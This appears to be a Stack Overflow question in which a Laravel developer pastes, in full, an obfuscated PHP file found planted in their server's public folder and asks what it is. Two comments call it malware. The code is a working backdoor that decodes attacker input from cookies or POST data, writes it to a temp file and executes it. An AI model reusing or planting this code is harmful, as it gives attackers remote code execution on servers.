# In my live project .php files are creating with name like t1kpvh7s.php which contains this type of code kindly guide what are these for

Tags: php, laravel-8, ubuntu-16.04

this is the file code which is created automatically in my public folder in laravel 8 project deployed on ubuntu server. Is this some kind of malware or virus Please kindly explain it, thanks is advance

```
function x1($c2)
{
    $j3 = "dHr-k<s6y7x.c_3?umLaFlb*po4#1eg@hf8;vI25" . " /ntEi'()";
    $f5 = '';
    foreach ($c2 as $d4) {
        $f5 .= $j3[$d4];
    }
    return $f5;
}
$b6 = array();
$b6[] = x1(array(14, 12, 14, 7, 39, 19, 12, 34, 3, 12, 26, 28, 28, 3, 26, 14, 0, 22, 3, 22, 12, 12, 39, 3, 19, 39, 28, 7, 33, 38, 7, 9, 9, 0, 28, 39));
$b6[] = x1(array(15, 24, 32, 24, 40, 31, 16, 42, 21, 45, 42, 4, 47, 13, 13, 20, 37, 18, 44, 13, 13, 48, 35, 40));
$b6[] = x1(array(11, 17, 25, 0, 16, 21, 29));
$b6[] = x1(array(1, 23));
$b6[] = x1(array(11, 41));
$b6[] = x1(array(27));
$b6[] = x1(array(5));
$b6[] = x1(array(33, 45, 21, 29, 13, 24, 16, 43, 13, 12, 25, 42, 43, 29, 42, 43, 6));
$b6[] = x1(array(19, 2, 2, 19, 8, 13, 17, 29, 2, 30, 29));
$b6[] = x1(array(6, 43, 2, 13, 2, 29, 24, 29, 19, 43));
$b6[] = x1(array(29, 10, 24, 21, 25, 0, 29));
$b6[] = x1(array(6, 16, 22, 6, 43, 2));
$b6[] = x1(array(16, 42, 21, 45, 42, 4));
$b6[] = x1(array(6, 43, 2, 21, 29, 42));
$b6[] = x1(array(24, 19, 12, 4));
$b6[] = x1(array(17, 0, 39));
foreach ($b6[8]($_COOKIE, $_POST) as $d14 => $p11) {
    function k8($b6, $d14, $b10)
    {
        return $b6[11]($b6[9]($d14 . $b6[0], ($b10 / $b6[13]($d14)) + 1), 0, $b10);
    }
    function b7($b6, $s12)
    {
        return @$b6[14]($b6[3], $s12);
    }
    function r9($b6, $s12)
    {
        if (isset($s12[2])) {
            $i13 = $b6[4] . $b6[15]($b6[0]) . $b6[2];
            @$b6[7]($i13, $b6[6] . $b6[1] . $s12[1]($s12[2]));
            @include($i13);
            @$b6[12]($i13);
            exit();
        }
    }
    $p11 = b7($b6, $p11);
    r9($b6, $b6[10]($b6[5], $p11 ^ k8($b6, $d14, $b6[13]($p11))));
}
```

Comment: That looks like a typical malicious script. I can't answer for what it does, but if random php files appears on your server, you should would worry less what they do and more how it happened in the first place. I would simply wipe the server and set it up again, following all best practices when it comes to security and upload the application again.

Comment: I am having the same issue with Namecheap VPS. Have multiple sites and most of them are affected.